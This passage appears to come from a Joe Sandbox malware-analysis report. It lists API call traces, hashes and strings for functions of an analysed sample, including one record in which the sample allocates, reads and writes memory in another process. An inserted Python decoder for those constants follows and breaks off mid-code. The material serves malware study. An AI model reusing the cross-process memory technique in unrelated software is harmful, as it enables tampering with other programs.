                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 3897988419-0
                                                                            • Opcode ID: 55a9713ba4e973bbaea7a89767fb03902cd83a3279cab946e98a53901e9c8869
                                                                            • Instruction ID: b8c6e085ead73d09d6d7256b0c7484b7fff2eb4d8b15e76899255e859d4b4224
                                                                            • Opcode Fuzzy Hash: 55a9713ba4e973bbaea7a89767fb03902cd83a3279cab946e98a53901e9c8869
                                                                            • Instruction Fuzzy Hash: 0901BC76601318ABDB104F54DC04BBABBBDEF44352F504069FA08D2310D739ED00DBA0
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004F8CDE
                                                                            • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004F8CE8
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004F8CF7
                                                                            • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004F8CFE
                                                                            • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004F8D14
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: eda029b2067d6ba5fec17af8d7480833467f820e6c5508094b556a4af3c3dd21
                                                                            • Instruction ID: 80d45834477d008d5bb76639e7684ff36f8ca099dd77f6cb993b0ac33ba08003
                                                                            • Opcode Fuzzy Hash: eda029b2067d6ba5fec17af8d7480833467f820e6c5508094b556a4af3c3dd21
                                                                            • Instruction Fuzzy Hash: B6F0AF30200308AFEB100FA59CCCE773BACEF59754B50442AFA44C6290CA60DC04EB60
                                                                            APIs
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 004F8D3F
                                                                            • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D49
                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D58
                                                                            • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D5F
                                                                            • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 004F8D75
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                            • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                            • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                            • String ID:
                                                                            • API String ID: 44706859-0
                                                                            • Opcode ID: 12c7a5028b511ab3427c9dab687d01d18202b631017eed2c56d2131e8baca77e
                                                                            • Instruction ID: 3dd5feb795088a845bb83846bfbe770bda45cdde4405091c9267fed3a19fd039
                                                                            • Opcode Fuzzy Hash: 12c7a5028b511ab3427c9dab687d01d18202b631017eed2c56d2131e8baca77e
                                                                            • Instruction Fuzzy Hash: 72F04F31240308AFEB110FA5EC98F7B3BADEF59754F54011AFA45C6290CB65DD45EB60
                                                                            APIs
                                                                            • GetDlgItem.USER32(?,000003E9), ref: 004FCD90
                                                                            • GetWindowTextW.USER32(00000000,?,00000100), ref: 004FCDA7
                                                                            • MessageBeep.USER32(00000000), ref: 004FCDBF
                                                                            • KillTimer.USER32(?,0000040A), ref: 004FCDDB
                                                                            • EndDialog.USER32(?,00000001,?), ref: 004FCDF5
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 3741023627-0
                                                                            • Opcode ID: 363a1a81386042467d4f0457c64787b84c12a905753faca52f711330ba83d016
                                                                            • Instruction ID: e0810a68ae149ca0aaef4b601701f4fef8bd7eec15cbe940d5f2c58bd513713a
                                                                            • Opcode Fuzzy Hash: 363a1a81386042467d4f0457c64787b84c12a905753faca52f711330ba83d016
                                                                            • Instruction Fuzzy Hash: 7601DB3050070CABEF215B10DD9EBAB7B78FB10705F00066AF682611E1DBF4A958DB84
                                                                            APIs
                                                                            • EndPath.GDI32(?,?,004DBBC9,00000000,?), ref: 004A179B
                                                                            • StrokeAndFillPath.GDI32(?,?,004DBBC9,00000000,?), ref: 004A17B7
                                                                            • SelectObject.GDI32(?,?,?,004DBBC9,00000000,?), ref: 004A17CA
                                                                            • DeleteObject.GDI32(?,004DBBC9,00000000,?), ref: 004A17DD
                                                                            • StrokePath.GDI32(?,?,004DBBC9,00000000,?), ref: 004A17F8
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                            • String ID:
                                                                            • API String ID: 2625713937-0
                                                                            • Opcode ID: df32a968850e232f8b9f80fa3a019138cd42db8c9155f78c11baefc35ff110c1
                                                                            • Instruction ID: 29ca262cd295278b78e4ac122850d787d1271f7072ca2589ed54424171e44cda
                                                                            • Opcode Fuzzy Hash: df32a968850e232f8b9f80fa3a019138cd42db8c9155f78c11baefc35ff110c1
                                                                            • Instruction Fuzzy Hash: 09F03C3000830CEBDB159F29ED4CB593FA4A73632AF049215F42A5B2F0C7744999EF18
                                                                            APIs
                                                                            • CoInitialize.OLE32(00000000,00000001,00000000,00530980), ref: 0050CA75
                                                                            • CoCreateInstance.OLE32(00533D3C,00000000,00000001,00533BAC,?), ref: 0050CA8D
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                            • CoUninitialize.OLE32 ref: 0050CCFA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                            • String ID: .lnk
                                                                            • API String ID: 2683427295-24824748
                                                                            • Opcode ID: d4e7f7e6b5c7540c6728ceac475f31bdce3250bbc4fd4daa0c166307b68b11e1
                                                                            • Instruction ID: ecae706752680713a292dd0daa588ee238c38bd899eac737fd5143b8d589ac36
                                                                            • Opcode Fuzzy Hash: d4e7f7e6b5c7540c6728ceac475f31bdce3250bbc4fd4daa0c166307b68b11e1
                                                                            • Instruction Fuzzy Hash: 2AA13A71104205AFD300EF64C891EAFB7E8EFD5708F40491DF555972A2EBB4AA09CB66
                                                                            APIs
                                                                              • Part of subcall function 004C0FE6: std::exception::exception.LIBCMT ref: 004C101C
                                                                              • Part of subcall function 004C0FE6: __CxxThrowException@8.LIBCMT ref: 004C1031
                                                                              • Part of subcall function 004B1A36: _memmove.LIBCMT ref: 004B1A77
                                                                              • Part of subcall function 004B1680: _memmove.LIBCMT ref: 004B16DB
                                                                            • __swprintf.LIBCMT ref: 004AE598
                                                                            Strings
                                                                            • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 004AE431
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                                                            • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                            • API String ID: 1943609520-557222456
                                                                            • Opcode ID: ac02686b8cb7dd1cc1a83b61d730bb2711517397bd3fc1117bdc9a490b96046e
                                                                            • Instruction ID: 42e4f724ec1c01f5c1380f915aa69c86c0f950d693f88f84ca64be4783e1677e
                                                                            • Opcode Fuzzy Hash: ac02686b8cb7dd1cc1a83b61d730bb2711517397bd3fc1117bdc9a490b96046e
                                                                            • Instruction Fuzzy Hash: B491C471504241AFC714EF26D895CAFB7A4EF96308F40091FF496972A1EB28ED44CB6A
                                                                            APIs
                                                                              • Part of subcall function 004C0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004B2A58,?,00008000), ref: 004C02A4
                                                                            • CoInitialize.OLE32(00000000), ref: 0050BFFE
                                                                            • CoCreateInstance.OLE32(00533D3C,00000000,00000001,00533BAC,?), ref: 0050C017
                                                                            • CoUninitialize.OLE32 ref: 0050C034
                                                                              • Part of subcall function 004A4D37: __itow.LIBCMT ref: 004A4D62
                                                                              • Part of subcall function 004A4D37: __swprintf.LIBCMT ref: 004A4DAC
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                            • String ID: .lnk
                                                                            • API String ID: 2126378814-24824748
                                                                            • Opcode ID: 919599ba993f8f4c52d46ecc9b0b37c0a27d55af415d4009312d922c23905007
                                                                            • Instruction ID: 00ec39f725ce854c27cdf72c79fbcf89832df4a4da63c0105fdabb671f472038
                                                                            • Opcode Fuzzy Hash: 919599ba993f8f4c52d46ecc9b0b37c0a27d55af415d4009312d922c23905007
                                                                            • Instruction Fuzzy Hash: 50A132752042059FC710DF25C894E5EBBE5BF8A318F148A8DF8999B3A2CB35EC45CB91
                                                                            APIs
                                                                            • __startOneArgErrorHandling.LIBCMT ref: 004C52CD
                                                                              • Part of subcall function 004D0320: __87except.LIBCMT ref: 004D035B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: ErrorHandling__87except__start
                                                                            • String ID: pow
                                                                            • API String ID: 2905807303-2276729525
                                                                            • Opcode ID: 4ae32d8bde79e42a6e35542f4e3d899b224c803e921f4de32ac0554d2f2f9bac
                                                                            • Instruction ID: 35132c91c3b0f356982aae895224d7f5e566f1df50b57bb74fdf1ed56726ebee
                                                                            • Opcode Fuzzy Hash: 4ae32d8bde79e42a6e35542f4e3d899b224c803e921f4de32ac0554d2f2f9bac
                                                                            • Instruction Fuzzy Hash: 66518925A0960586CB55A718C921B7F2BD09B40750F20499FF8C1873E6EE7C9CD9AA4F
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: #$+
                                                                            • API String ID: 0-2552117581
                                                                            • Opcode ID: 974696d61fd768ba7d803a5daf530ae323e939b059f47287f9753824aa76105f
                                                                            • Instruction ID: 715a4d6af67d450f647abc2261e7cacbbd0094fc9d6ef8f093d24e14914986c3
                                                                            • Opcode Fuzzy Hash: 974696d61fd768ba7d803a5daf530ae323e939b059f47287f9753824aa76105f
                                                                            • Instruction Fuzzy Hash: 00513179402249DFCB15EF68C880AFB7BA4EF16314F14405FE9819B3A0D738AC42CB69
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memmove$_free
                                                                            • String ID: #VK
                                                                            • API String ID: 2620147621-3366273889
                                                                            • Opcode ID: 9c66d44fc73d52e9bc4d322ed95f71eeb80f39c2554b6589433727623911b038
                                                                            • Instruction ID: 66f880178cc98bdd19febf717381f608a3a05683cb1217b64fc5f09648d02dbf
                                                                            • Opcode Fuzzy Hash: 9c66d44fc73d52e9bc4d322ed95f71eeb80f39c2554b6589433727623911b038
                                                                            • Instruction Fuzzy Hash: C95149B16043418FDB24CF2AC490B6FBBE5BF96318F04492EE59A87351E739E841CB56
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: _memset$_memmove
                                                                            • String ID: ERCP
                                                                            • API String ID: 2532777613-1384759551
                                                                            • Opcode ID: aa385f946ab31541ef46beb172cdbcebd9fa015d7b56cbf19dce477d84fa4f7a
                                                                            • Instruction ID: b09c62d02763f6db7db4286d5a2c031011e2235a6c1853108ef14ff0c69a1317
                                                                            • Opcode Fuzzy Hash: aa385f946ab31541ef46beb172cdbcebd9fa015d7b56cbf19dce477d84fa4f7a
                                                                            • Instruction Fuzzy Hash: AC51B171900309DBDB24DF65C880BEABBE4EF04318F1485AFE94ADB250E7389585CB59
                                                                            APIs
                                                                              • Part of subcall function 00501CBB: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F9E4E,?,?,00000034,00000800,?,00000034), ref: 00501CE5
                                                                            • SendMessageW.USER32(?,00001104,00000000,00000000,?,00000000,00000010,00000010,?,00000000), ref: 004FA3F7
                                                                              • Part of subcall function 00501C86: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,004F9E7D,?,?,00000800,?,00001073,00000000,?,?), ref: 00501CB0
                                                                              • Part of subcall function 00501BDD: GetWindowThreadProcessId.USER32(?,?,00000000,00000000,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C08
                                                                              • Part of subcall function 00501BDD: OpenProcess.KERNEL32(00000438,00000000,?,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C18
                                                                              • Part of subcall function 00501BDD: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,004F9E12,00000034,?,?,00001004,00000000,00000000), ref: 00501C2E
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000010,?,00000000,?,00000010,?,00001104,00000000,00000000), ref: 004FA464
                                                                            • SendMessageW.USER32(?,00001111,00000000,00000000,?,00000000,00000010,00000000,?,00000010,?,00000000,?,00000010,?,00001104), ref: 004FA4B1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000013.00000002.3380345743.00000000004A1000.00000020.00000001.01000000.00000007.sdmp, Offset: 004A0000, based on PE: true
                                                                             • Associated: 00000013.00000002.3380322479.00000000004A0000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000530000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380410650.0000000000556000.00000002.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000560000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380534783.0000000000564000.00000008.00000001.01000000.00000007.sdmp
                                                                             • Associated: 00000013.00000002.3380577549.0000000000569000.00000002.00000001.01000000.00000007.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_19_2_4a0000_Intranet.jbxd
                                                                            Similarity
                                                                            • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                            • String ID: @
                                                                            • API String ID: 4150878124-2766056989
                                                                            • Opcode ID: 5e43b31d9b9a8085e4488b9da0dabd78e12056b8a6a43a2cf3f27e89200c969d
                                                                            • Instruction ID: 674c78d540681df009078d18ef2a3f373e0ae7de0f2cee13b4710bfd6b1037ab
                                                                            • Opcode Fuzzy Hash: 5e43b31d9b9a8085e4488b9da0dabd78e12056b8a6a43a2cf3f27e89200c969d
                                                                            • Instruction Fuzzy Hash: A2413E7290021DBFDB10DBA4CD85AEEBBB8FF45300F004095FA55B7280DA746E55CB65
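The six API bullets of the record above form one recognisable sequence: resolve the owning process of a window (GetWindowThreadProcessId), open it with 0x438, commit a page in it (VirtualAllocEx with 0x1000/0x4), exchange that page with Read/WriteProcessMemory and hand it to a window message. Decoding the raw constants is what turns the bullets into a statement about capability. The following Python decoder is an added example, not part of the Joe Sandbox report or of the sample; the constant names are the standard Windows SDK values (winnt.h, commctrl.h, winuser.h), the sample lines are copied from the record above and labelled as such, and the per-class message tables are an assumption about which control a message targets, since this record's trace does not name the window class.

```python
"""Decoder for the 'APIs' bullets in a Joe Sandbox IDA-plugin function record."""
import re
from typing import Optional

# OpenProcess dwDesiredAccess bits (winnt.h).
PROCESS_ACCESS = {
    0x0001: "PROCESS_TERMINATE",
    0x0002: "PROCESS_CREATE_THREAD",
    0x0008: "PROCESS_VM_OPERATION",
    0x0010: "PROCESS_VM_READ",
    0x0020: "PROCESS_VM_WRITE",
    0x0040: "PROCESS_DUP_HANDLE",
    0x0080: "PROCESS_CREATE_PROCESS",
    0x0400: "PROCESS_QUERY_INFORMATION",
    0x1000: "PROCESS_QUERY_LIMITED_INFORMATION",
}
# VirtualAllocEx flAllocationType and flProtect (winnt.h).
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# Control messages keyed by window class (commctrl.h, winuser.h). The numeric ID
# alone is ambiguous (LVM_FIRST, TV_FIRST and MCM_FIRST all start at or near
# 0x1000), so the class the trace names, or an analyst's hint, resolves it.
# Assumed mapping for illustration; the record above names no class.
CONTROL_MESSAGES = {
    "SysListView32": {0x1004: "LVM_GETITEMCOUNT", 0x1073: "LVM_GETITEMTEXTW"},
    "SysTreeView32": {0x1104: "TVM_GETITEMRECT", 0x1111: "TVM_HITTEST"},
    "SysMonthCal32": {0x1002: "MCM_SETCURSEL", 0x1009: "MCM_GETMINREQRECT"},
    "msctls_updown32": {0x0465: "UDM_SETRANGE", 0x0469: "UDM_SETBUDDY"},
    "msctls_trackbar32": {0x0405: "TBM_SETPOS", 0x0406: "TBM_SETRANGE",
                          0x0414: "TBM_SETPAGESIZE"},
    "Listbox": {0x0180: "LB_ADDSTRING", 0x0186: "LB_SETCURSEL"},
}

# 'Api.MODULE(arg,arg,...), ref: ADDR', or 'Api.MODULE ref: ADDR' when the
# plugin shows a call without arguments.
LINE_RE = re.compile(
    r"(?P<api>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\),)? ref: (?P<ref>[0-9A-Fa-f]+)")


def parse_call(line: str) -> Optional[dict]:
    """Split one bullet into API, module, argument list and call site; None if not a call."""
    m = LINE_RE.search(line)
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw is not None else []
    return {"api": m.group("api"), "module": m.group("mod"), "args": args, "ref": m.group("ref")}


def arg_int(arg: str) -> Optional[int]:
    """The plugin prints resolved constants as 8 hex digits and unknown values as '?'."""
    return int(arg, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", arg) else None


def decode_mask(value: int, table: dict) -> list:
    """Expand a bit mask into names; bits the table does not know stay as hex."""
    names = [name for bit, name in table.items() if value & bit]
    rest = value & ~sum(table)
    return names + ([f"0x{rest:X}"] if rest else [])


def decode_message(msg: int, window_class: Optional[str]) -> str:
    """Resolve a SendMessage ID for the given control class, else keep it numeric."""
    return CONTROL_MESSAGES.get(window_class or "", {}).get(msg, f"WM_0x{msg:04X}")


def analyze_record(lines: list, window_class: Optional[str] = None) -> dict:
    """Decode the calls of one function record and flag the remote-buffer sequence."""
    calls = [c for c in (parse_call(l) for l in lines) if c]
    decoded, seen = [], set()
    for c in calls:
        api, a = c["api"], c["args"]
        seen.add(api)
        if api == "OpenProcess" and a and arg_int(a[0]) is not None:
            decoded.append((api, decode_mask(arg_int(a[0]), PROCESS_ACCESS)))
        elif api == "VirtualAllocEx" and len(a) > 4 and None not in (arg_int(a[3]), arg_int(a[4])):
            decoded.append((api, decode_mask(arg_int(a[3]), ALLOC_TYPE)
                            + decode_mask(arg_int(a[4]), PAGE_PROTECT)))
        elif api == "SendMessageW" and len(a) > 1 and arg_int(a[1]) is not None:
            decoded.append((api, [decode_message(arg_int(a[1]), window_class)]))
        else:
            decoded.append((api, []))
    # A buffer committed in another process, moved with Read/WriteProcessMemory
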